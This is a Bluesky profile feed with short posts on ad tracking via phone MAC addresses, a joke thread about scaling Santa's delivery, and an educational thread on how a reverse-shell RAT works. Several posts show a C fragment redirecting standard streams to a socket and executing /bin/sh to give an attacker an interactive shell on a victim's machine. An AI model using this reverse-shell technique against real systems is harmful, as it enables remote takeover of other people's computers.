drop table users
knownhost.bsky.social
drop table users
@knownhost.bsky.social
wannabe h4ck3r | recurse center alum
radio hat
August 15, 2025 at 3:43 PM
Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on I’m at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)
April 8, 2025 at 7:26 PM
implement “quick access” and i’ll make the switch from 1pass
January 9, 2025 at 4:17 PM
at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery
December 24, 2024 at 6:54 PM
instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos
December 24, 2024 at 6:54 PM
the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized
December 24, 2024 at 6:36 PM
this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victims machine.

full write-up here: jackcarrick.net/blog/reverse...
December 15, 2024 at 4:32 PM
because “everything is a file” in unix systems you can do the same redirection with a networking socket

int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);

Then execute a shell
execve("/bin/sh", argv, NULL);
December 15, 2024 at 4:32 PM
so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)
December 15, 2024 at 4:32 PM
upon connecting to the server an attacker can input commands into the victims shell as if it were their own more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start
December 15, 2024 at 4:32 PM
so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo “foo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)
December 15, 2024 at 3:45 PM
upon connecting to the server an attacker can input commands into the victims shell as if it were their own

more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start
December 15, 2024 at 3:45 PM